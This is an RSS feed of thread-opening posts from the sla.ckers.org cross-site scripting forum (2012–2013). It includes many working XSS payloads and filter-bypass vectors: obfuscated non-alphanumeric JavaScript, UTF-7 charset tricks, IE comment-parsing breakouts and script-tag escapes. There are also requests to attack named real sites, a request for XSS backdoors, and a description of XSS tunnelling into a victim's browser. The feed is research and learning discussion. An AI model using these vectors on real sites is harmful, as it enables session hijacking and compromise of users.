<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Web Application Security Forum - XSS Info</title>
        <description>Q and A for any cross site scripting information. Feel free to ask away.</description>
        <link>http://sla.ckers.org/forum/list.php?2</link>
        <lastBuildDate>Sun, 19 May 2013 05:16:49 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51695,51695#msg-51695</guid>
            <title>XSS in hidden Field (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51695,51695#msg-51695</link>
            <description><![CDATA[Hi, <br />
<br />
is it possible to have an exploit here? <br />
<br />
&lt;input type=&quot;hidden&quot; value=&quot;INPUT&quot; name=&quot;test&quot;&gt; <br />
<br />
INPUT is user input <br />
&lt;,&gt;,(,) are encoded <br />
<br />
I know we can exploit using style tag.. but the problem is I can't use (,) symbols... so is there anyway to bypass it.<br />
<br />
regards]]></description>
            <dc:creator>kamal</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 26 Feb 2013 13:48:29 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51690,51690#msg-51690</guid>
            <title>XSS Challenge (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51690,51690#msg-51690</link>
            <description><![CDATA[Hey folks,<br />
<br />
I am new here. Is nice to meet you guys.<br />
<br />
I am with a challenge, but I could not solve it. I need bypass a regex to execute javascript inside eval.<br />
<br />
The code is:<br />
<br />
function json(a){ <br />
    if (/^\s*$/.test(a) ? 0 : /^[\],:{}\s\u2028\u2029]*$/<br />
        .test(a.replace(/\\[&quot;\\\/bfnrtu]/g, &quot;@&quot;)<br />
        .replace(/&quot;[^&quot;\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*&quot;|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, &quot;]&quot;)<br />
        .replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g, &quot;&quot;))) <br />
<br />
     try{ <br />
         return eval(&quot;(&quot; + a + &quot;)&quot;) <br />
     } catch (b) {} <br />
     g(Error(&quot;Invalid JSON string: &quot; + a)) <br />
}<br />
//... <br />
json(window.name);<br />
<br />
<br />
This (&quot;true);alert(9);//&quot; is very close to a valid javascript statement and will bypass this regex, but still is invalid. The problem? The quote. =(<br />
<br />
Any ideas?]]></description>
            <dc:creator>lucasnn</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 08 Feb 2013 00:46:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51680,51680#msg-51680</guid>
            <title>Cross Site Scripting Tunneling (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51680,51680#msg-51680</link>
            <description><![CDATA[I haven't found anything about this kind of attacks in the forum so I wan't to post some information abaut XSS Tunneling.<br />
<br />
~&gt; What's a XSS tunnel?<br />
<br />
Ok, XSST is a HTTP connection that you can stablish with a victim trhow a XSS usually attack.<br />
<br />
~&gt; What offers this attack?<br />
<br />
This kind of attacks offers you a shell based on JS and allows you to execute some commands in victim's PC but the best of it is that you can configure victim's browser so as to reconnect whit your machine every  time it starts.<br />
<br />
More info ~~~&gt; labs[dot]portcullis[dot]co[dot]uk/application/xss-tunnelling/<br />
<br />
There is a paper in the web very easy so as to understand it.<br />
<br />
Gr33tings!]]></description>
            <dc:creator>Sr.Gr33n</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 27 Jan 2013 11:44:16 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51559,51559#msg-51559</guid>
            <title>How to use these XSS jnection vectors? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51559,51559#msg-51559</link>
            <description><![CDATA[Hi all<br />
<br />
I'm dedicated in learn XSS, I understand the basic and I'm learning everyday more and more - thanks to this great forum and all you guys.<br />
<br />
Most of my tests are with FireFox 16.0.2 and this vulnerable test site (it's a site created intentionally to be vulnerable and test web issues):<br />
<br />
http://demo.testfire.net/search.aspx?txtSearch=&lt;script&gt;alert(1)&lt;/script&gt;<br />
<br />
However, if you prefer any other to give me an working example not problem. :)<br />
<br />
During these days I have collected a set of XSS payloads that are very interesting, however I'm unable to reproduce them and make the so wanted alert box appear. Can you please take a look at them and let me know why they are not working on my target test site?<br />
<br />
Case #01:<br />
<br />
/./iiin({}) // Chrome only<br />
<br />
Ref.: http://sla.ckers.org/forum/read.php?2,29090,page=12<br />
<br />
I tested with last version of Chrome and it doesn't work. Is it really possible to generate an alert box? Or is it just an test that do not produce anything useful?<br />
<br />
Case #02:<br />
<br />
“&lt;META HTTP-EQUIV=â€Linkâ€ Content=â€&lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheetâ€&gt;”<br />
<br />
Ref.: http://www.thespanner.co.uk/2007/10/01/xss-attacks-a-practical-example/<br />
<br />
I tested with last version of Chrome and my Firefox and it doesn't work. Can someone point me what's wrong? Also, is there an special way to encode it to make it work?<br />
<br />
I tried it like these without success:<br />
<br />
http://demo.testfire.net/search.aspx?txtSearch=“&lt;META HTTP-EQUIV=â€Linkâ€ Content=â€&lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheetâ€&gt;”<br />
<br />
http://demo.testfire.net/search.aspx?txtSearch=“&gt;&lt;META HTTP-EQUIV=â€Linkâ€ Content=â€&lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheetâ€&gt;”<br />
<br />
http://demo.testfire.net/search.aspx?txtSearch=%E2%80%9C%3CMETA%20HTTP-EQUIV%3D%C3%A2%E2%82%AC%C2%9DLink%C3%A2%E2%82%AC%C2%9D%20Content%3D%C3%A2%E2%82%AC%C2%9D%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%26gt%3B%3B%20REL%3Dstylesheet%C3%A2%E2%82%AC%C2%9D%3E%E2%80%9D<br />
<br />
Case #03:<br />
<br />
I have seen many of these crazy payloads:<br />
<br />
([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()[([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+[])]+(![]+[])[+!![]+!![]]]('alert(1)')<br />
<br />
OR<br />
<br />
+[+[+[]==+[]][+[]]+[[[]+[][+[]]][+[]][+[+[]==+[]][+[]]+[+[]==+[]][+[]]+[+[]==+[]][+[]]]+[]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]]]<br />
<br />
However it doesn't work - I'm pretty sure that I'm missing something to make it works. I tested on last version of Chrome and Firefox on the test site with encoding, adding &lt;script&gt; tag, etc and nothing. Can soneome please give me an working example? I guess should be a generic way to test it such as we do with &lt;script&gt;alert(1)&lt;/script&gt;, right?<br />
<br />
Case #04:<br />
<br />
Another very weird XSS payload, never worked in my tests with the environment previouus described.<br />
<br />
&lt;@uni&gt;b=&lt;@/uni&gt;/\u/&lt;@uni&gt;[-1]&lt;@/uni&gt;&lt;@uni&gt;z=&lt;@/uni&gt;/00/&lt;@uni&gt;[-1]&lt;@/uni&gt;&lt;@uni&gt;c=&lt;@/uni&gt;/c/&lt;@uni&gt;[-1]&lt;@/uni&gt;&lt;@uni&gt;e=0[&lt;@/uni&gt;'&lt;@hex&gt;ev&lt;@/hex&gt;&lt;@oct&gt;al&lt;@/oct&gt;'&lt;@uni&gt;](&lt;@/uni&gt;'&lt;@oct&gt;b+z+61+b+z+6+c+b+z+65+b+z+72+b+z+74+b+z+28+b+z+31+b+z+29&lt;@/oct&gt;'&lt;@uni&gt;)&lt;@/uni&gt;&lt;@uni&gt;0[&lt;@/uni&gt;'&lt;@oct&gt;ev&lt;@/oct&gt;&lt;@hex&gt;al&lt;@/hex&gt;'&lt;@uni&gt;](e)&lt;@/uni&gt; <br />
<br />
Is is real? Someone got it working? How? Can you please give me an example?<br />
<br />
Case #05:<br />
<br />
These payloads where you are in theory able to change the conten-type and define it as UTF-7 and inject this payloads with unicode or even non-alpha. Some payloads that I found use &lt;head&gt; before meta tag, however, none of them work. I tried URL-encode, inject &lt;script&gt;  tag before, etc. I think they are very, very specific or I'm missing something. <br />
<br />
&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt;this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']<br />
<br />
&lt;head&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt;'\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029'.replace(/\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)&lt;/head&gt;<br />
<br />
&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt;2BIBoAxAPAACU-tag+style%2BAD0AIg-xss%3Aexpression%28alert%286%29%29%2BACI-+%2BIBoAxCIr-<br />
<br />
Can you please give a working example?<br />
<br />
Case #06: - OK, I promise, this is the last one :-)<br />
<br />
This one use some kind of strange charset, never worked here as well. I have no idea about how to encode it because with URL-encode it doesn't work to produce a alter box.<br />
<br />
â€œÂ¼scriptÂ¾alert(Â¢XSSÂ¢)Â¼/scriptÂ¾â€<br />
<br />
As I told on the beginning, please, feel free to test all of them on the test website (http://demo.testfire.net/search.aspx?txtSearch=InjectHere) and please, let me know if you were able to reproduce any of them. Also, if you prefer to use any other test site no problem. Maybe is there any requirement on the vulnerable script that is not present in this test site?<br />
<br />
As you see I'm very curious about this strange and weird XSS, I would love to see them working, but I was unable myself, so I'm asking your help sla.ckers masters.<br />
<br />
Thanks.]]></description>
            <dc:creator>rickm</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 24 Nov 2012 06:01:23 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51539,51539#msg-51539</guid>
            <title>XSS Waf Bypass 19/OCT/2012 (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51539,51539#msg-51539</link>
            <description><![CDATA[Xss waf bypass using non-alphanumeric characters.Generate alert without using characters or numbers.<br />
+<br />
Detailed process for webpage rendering for begineers who want to go for XSS.<br />
<br />
here is the link<br />
http://adf.ly/E81iz]]></description>
            <dc:creator>Vaibs</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 25 Dec 2012 23:07:46 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51515,51515#msg-51515</guid>
            <title>Xss reflected in cookie (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51515,51515#msg-51515</link>
            <description><![CDATA[Hi guys, is it possible to exploit a XSS reflected in cookies?<br />
Thanks]]></description>
            <dc:creator>acemutha</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 13 Oct 2012 04:28:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51495,51495#msg-51495</guid>
            <title>Close quoted attribute with anything except quote (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51495,51495#msg-51495</link>
            <description><![CDATA[&lt;input value=&quot;[yourinput]&quot;/&gt;<br />
<br />
The input is filtered for &quot; and nothing else. &lt; and &gt; are perfectly allowed. I feel that this must be exploitable in some browsers but I don't see how. Any ideas?]]></description>
            <dc:creator>Albino</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 25 Sep 2012 02:26:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51483,51483#msg-51483</guid>
            <title>Working Chrome vectors (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51483,51483#msg-51483</link>
            <description><![CDATA[Been out of the loop for a while, looks like the mainstream browsers have upped their game in terms of reflective XSS filters since I last looked, in particular I'm struggling to get anything working with Chrome as it removes any onerror, onmouseover attributes, strips anything within script tags, I saw some recent challenges that were using multiple inputs to fool the filters, is that what it takes nowadays to get execution from reflective vulnerabilities?]]></description>
            <dc:creator>asilvermtzion</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 16 Sep 2012 08:57:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51481,51481#msg-51481</guid>
            <title>HTTP 302 + Location + XSS (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51481,51481#msg-51481</link>
            <description><![CDATA[Hi folks,<br />
<br />
I found an XSS like this:<br />
<br />
HTTP/1.1 302 Found<br />
Server: Apache<br />
Content-Type: text/html; charset=ISO-8859-1<br />
Location: http://localhost/&lt;script&gt;alert(123)&lt;/script&gt;<br />
<br />
&lt;a href='http://localhost/&lt;script&gt;alert(123)&lt;/script&gt;'&gt;http://localhost/&lt;script&gt;alert(123)&lt;/script&gt;&lt;/a&gt;<br />
<br />
but, I can't obtain js execution.. is there any way to let the browser render the html/execute the payload before performing the redirection ?<br />
<br />
Thanks]]></description>
            <dc:creator>choronzon</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 30 Sep 2012 08:20:17 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51478,51478#msg-51478</guid>
            <title>Evading some input filters (of ' and &quot;) in Firefox (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51478,51478#msg-51478</link>
            <description><![CDATA[Hi!<br />
<br />
Testing an application that had filtered the quotes ' and &quot;, but not &lt; and &gt;, I found that in Firefox you can close the &lt;script&gt; section from a variable enclosed by quotes '' or double quotes &quot;&quot;.<br />
<br />
For example, if you have:<br />
<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
			var injectable ='p1injectable';<br />
&lt;/script&gt;<br />
<br />
Imagine that is not possible to inject a quote because is filtered, but the characters &lt; and &gt; are not filtered in any way, then you can inject the following:<br />
<br />
p1&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;<br />
<br />
having something like this:<br />
<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
			var injectable ='p1&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;';<br />
&lt;/script&gt;<br />
<br />
In this case, Firefox closes the first &lt;script&gt;, and then it executes the alert. I tested it on Firefox 15. In chrome this does not work and I didnt tested it on IE.<br />
<br />
Regards!<br />
<br />
Mario]]></description>
            <dc:creator>Gryphus</dc:creator>
            <category>XSS Info</category>
            <pubDate>Wed, 12 Sep 2012 03:36:23 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51348,51348#msg-51348</guid>
            <title>referer XSS question (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51348,51348#msg-51348</link>
            <description><![CDATA[Hi all,<br />
<br />
I found a web app that prints referrer in HREF attribute value:<br />
<br />
&lt;A HREF=&quot;&lt;?php echo htmlspecialchars($_SERVER['HTTP_REFERER']);?&gt;&quot;&gt;go back&lt;/A&gt;<br />
<br />
Is there any chance for XSS attack?<br />
<br />
I tried on several browsers, and it seems that browsers do not send<br />
referrer URL with &quot;javascript:&quot; or &quot;data:&quot; scheme, even the URL of<br />
the originating web page has such schemes.]]></description>
            <dc:creator>raracho</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 21 Aug 2012 12:07:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51344,51344#msg-51344</guid>
            <title>Crazy IE comment symbol :] (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51344,51344#msg-51344</link>
            <description><![CDATA[&lt;!-- `&lt;img/src=xx:xx onerror=alert(1)//--!&gt;<br />
<br />
&lt;!-- &quot; --!&gt;&lt;input value=&quot;&gt;&lt;img src=xx:x onerror=alert(1)//&quot;&gt;<br />
<br />
&lt;![if&lt;iframe/onload=vbs::alert[:]&gt;<br />
<br />
&lt;![&lt;img src=x:x onerror=alert(1)//]--&gt;<br />
<br />
&lt;style&gt;//&lt;!--&lt;/style&gt; --&gt;*{x:expression(alert(URL=3))}//&lt;style&gt;&lt;/style&gt;<br />
<br />
&lt;xmp&gt;&lt;!--&lt;/xmp&gt;&lt;img src=&quot;//mmme.me#--&gt;&lt;/xmp&gt;&lt;img src=xx:x onerror=alert(1)//&quot;/&gt;<br />
<br />
&lt;!-- --!&gt;&lt;input value=&quot;--&gt;&lt;body/onload=alert(1)//&quot;&gt;<br />
<br />
&lt;script&gt;/*&lt;!--&lt;/script&gt;--&gt;*/alert(1)/*&lt;script&gt;*/&lt;/script&gt;]]></description>
            <dc:creator>jackmasa</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 17 Aug 2012 05:54:42 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51088,51088#msg-51088</guid>
            <title>XSS via child document? (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51088,51088#msg-51088</link>
            <description><![CDATA[I can embed an iframe in a website, but I can't point it to anything along the lines of &quot;javascript:alert(1)&quot;.  Is there a page I can build that can run javascript in the context of the parent document?  SOP prevents me from directly accessing things like parent.document.  Any ideas?]]></description>
            <dc:creator>cr101</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 12 Aug 2012 13:31:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,51066,51066#msg-51066</guid>
            <title>XSS + FF/Chrome + plain/text (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,51066,51066#msg-51066</link>
            <description><![CDATA[Hello,<br />
 <br />
I have and xss like this:<br />
<br />
POST /...<br />
Host: server<br />
...<br />
<br />
par=&lt;XSS&gt;<br />
<br />
<br />
HTTP/1.1 200 OK<br />
...<br />
Content-Type: text/plain; charset=UTF-8<br />
...<br />
<br />
{&quot;par&quot;:&quot;&lt;XSS&gt;&quot;}<br />
<br />
<br />
client-side code execution can be obtained with IE, but I need a working vector for FF or Chrome. Any suggestions?<br />
<br />
Thanks,<br />
c.]]></description>
            <dc:creator>choronzon</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 17 Jul 2012 05:22:15 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,50365,50365#msg-50365</guid>
            <title>10 new private xss detected on msn sub domain (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,50365,50365#msg-50365</link>
            <description><![CDATA[POC<br />
<br />
<br />
http://vaibs.comuv.com/5.jpg<br />
http://vaibs.comuv.com/6.jpg<br />
http://vaibs.comuv.com/7.jpg<br />
http://vaibs.comuv.com/8.jpg<br />
http://vaibs.comuv.com/9.jpg<br />
http://vaibs.comuv.com/10.jpg<br />
http://vaibs.comuv.com/11.jpg<br />
http://vaibs.comuv.com/12.jpg<br />
http://vaibs.comuv.com/13.jpg<br />
http://vaibs.comuv.com/14.jpg]]></description>
            <dc:creator>Vaibs</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 25 Jun 2012 11:16:32 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,50363,50363#msg-50363</guid>
            <title>Does anyone know of any good XSS backdoors? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,50363,50363#msg-50363</link>
            <description><![CDATA[Besides that well-known one written in ASP.]]></description>
            <dc:creator>cookiesui</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 24 Jun 2012 22:29:35 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,49857,49857#msg-49857</guid>
            <title>JavaScript via CSS (9 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,49857,49857#msg-49857</link>
            <description><![CDATA[Hello,<br />
<br />
are there still possibilities to execute JavaScript via stylesheets?<br />
<br />
The common methods like expression or moz-binding are not working in modern web browsers. It seems that Mozilla completely removed the -moz-binding functionality. <br />
<br />
Regards]]></description>
            <dc:creator>Jean Pascal Pereira</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sun, 01 Jul 2012 16:11:29 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,49835,49835#msg-49835</guid>
            <title>How about this solution for cross domain set cookie? (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,49835,49835#msg-49835</link>
            <description><![CDATA[There are 2 domain using the same cookie pair(uid &amp; sid) for authenticate user:<br />
www.logger.com<br />
www.logspot.com<br />
<br />
uid was to identify a user, and sid was to authenticate him.<br />
<br />
Suppose most of the user will login via www.logger.com, and the browser will set the cookie:<br />
Set-Cookie: uid=15732; PATH=/; DOMAIN=logger.com;<br />
Set-Cookie: sid=FupX5px7X; PATH=/; DOMAIN=logger.com;<br />
<br />
And when the user click a hyper link in www.logger.com to jump to www.logspot.com/index.html, I don't want that user input his uid and password again.<br />
<br />
I wrote a script which place in www.logger.com (http://www.logger.com/get_sid.php):<br />
&lt;?php<br />
        header(&quot;Content-Type: application/x-javascript&quot;);<br />
<br />
        if (isset($_COOKIE[&quot;uid&quot;]) &amp;&amp; isset($_COOKIE[&quot;sid&quot;])) {<br />
				echo &quot;document.cookie = 'uid=&quot;  . $_COOKIE[&quot;uid&quot;]  . &quot;; path=/; domain=logspot.com;';\n&quot;;<br />
				echo &quot;document.cookie = 'sid=&quot; . $_COOKIE[&quot;sid&quot;] . &quot;; path=/; domain=logspot.com;';\n&quot;;<br />
        } else {<br />
                echo &quot;void(0);&quot;;<br />
        }<br />
?&gt;<br />
<br />
And then, I put this script inside www.logspot.com/index.html:<br />
&lt;script src=&quot;http://www.logger.com/get_sid.php&quot;&gt;<br />
<br />
I have try that this script can set the cookie for www.logspot.com.<br />
<br />
I have try to JSON-Hijacking this script, but I failed.<br />
<br />
Do you think this solution is safe to use?]]></description>
            <dc:creator>joel</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 25 May 2012 20:50:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,49606,49606#msg-49606</guid>
            <title>meta name&amp;value injection (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,49606,49606#msg-49606</link>
            <description><![CDATA[I have the following injection:<br />
<br />
&lt;meta name=&quot;[input1]&quot; content=&quot;[input2]&quot;&gt;<br />
<br />
The only characters accepted are a-Z 0-9 - and _ <br />
<br />
Any ideas? I can't use http-equiv and &lt;meta name=&quot;author&quot; input=&quot;albino&quot;&gt; just isn't severe enough for my taste. Viewport looks interesting but I can't use =.]]></description>
            <dc:creator>Albino</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 18 Jun 2012 19:57:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,48391,48391#msg-48391</guid>
            <title>XSS (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,48391,48391#msg-48391</link>
            <description><![CDATA[hi<br />
<br />
I don't know how I can use xss attack in the following sites:<br />
<br />
http://petition.adliran.ir/<br />
<br />
and<br />
<br />
http://adliran.ir/default_.aspx (I think it doesn't have a xss attack-but not sure)<br />
<br />
<br />
pls guide me]]></description>
            <dc:creator>mpour</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 08 May 2012 18:26:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,48355,48355#msg-48355</guid>
            <title>Opera strange onerror execution (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,48355,48355#msg-48355</link>
            <description><![CDATA[Hey, after finding out that this executes:<br />
&lt;img src=&quot;x&quot; =&quot;_=&quot; title=&quot;onerror='alert(1)'&quot;&gt;<br />
<br />
I tried to found values before the =, which still execute the onerror event.<br />
After using the whole Unicode Range, I found out that opera execute the onerror<br />
with certain unicode characters. <br />
BUT the unicodes which works change from time to time and from machine to machine. Additionally it works only if there a additionall &lt;img&gt; objects, they don't work with just one img object. <br />
Here is a test page, its the unicode range from 1048576 - 1114111 (in decimal). <br />
In this range only one alert gets triggered. <br />
<br />
http://akjor.bplaced.net/fuzzer-1114112.html<br />
<br />
In the alert box is the decimal value of the used unicode char.<br />
Maybe you can help me to understand why this is happening<br />
<br />
W4yne<br />
<br />
BTW: Tested on Opera 11.62, Firefox 12 (which freezes when loading the page) and IExplorer. Chrome is not tested yet.]]></description>
            <dc:creator>W4yne</dc:creator>
            <category>XSS Info</category>
            <pubDate>Sat, 28 Apr 2012 02:54:19 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,46077,46077#msg-46077</guid>
            <title>how to prevent xss in textarea tag? (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?2,46077,46077#msg-46077</link>
            <description><![CDATA[I have google for this topic, but I can't found any solution.<br />
<br />
http://ha.ckers.org/blog/20070617/another-google-xss-in-google-documents/<br />
<br />
in this blog, RSnake Says: <br />
June 18th, 2007 at 3:03 pm<br />
&lt;comment&gt; &lt;!– –&gt; within iframe tags, noscript tags, and I’m sure there are several others.<br />
<br />
I am not understand how to do.<br />
<br />
If I filter the &lt;,&gt;,',&quot; use htmlspecialchars() in PHP, the content output in the html would be:<br />
&lt;textarea&gt;<br />
&amp;lt;<br />
&amp;gt;<br />
&amp;quot;<br />
&amp;#39;<br />
&lt;/textarea&gt;<br />
<br />
But if do not filter these, there would be XSS, such as:<br />
&lt;textarea&gt;                                  ---system generate<br />
&lt;/textarea&gt;                                 ---user input<br />
&lt;img src=&quot;javascript:alert('XSS')&quot;          ---user input<br />
&lt;textarea&gt;                                  ---user input<br />
<br />
&lt;/textarea&gt;            ---system generate<br />
<br />
Even if I filter the &lt;/textarea&gt; tag, &lt;/tex&lt;/textarea&gt;tarea&gt; will bypass it.]]></description>
            <dc:creator>joel</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 17 Apr 2012 09:36:27 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,46068,46068#msg-46068</guid>
            <title>internet explorer madness (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,46068,46068#msg-46068</link>
            <description><![CDATA[I have a page that loads a third party stylesheet and alert()'s some info from it. For some reason it only works if I open it locally; hosting the page anywhere breaks it. <br />
<br />
Here's the code:<br />
<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;link rel=&quot;stylesheet&quot; href=&quot;https://SNIP&quot; type=&quot;text/css&quot;&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;script&gt;<br />
alert(document.body.currentStyle.fontFamily);<br />
&lt;/script&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
<br />
I've looked at the HTTP requests in burp and they appear to be identical, except that the local one is missing the Referer header since it's cross-protocol.<br />
<br />
I've tried changing the doctype &amp; turning quirks mode on and off to to avail. Any ideas?]]></description>
            <dc:creator>Albino</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 23 Apr 2012 07:24:34 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,45385,45385#msg-45385</guid>
            <title>Bypassing Chrome XSS filter + Apache mod_security? (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?2,45385,45385#msg-45385</link>
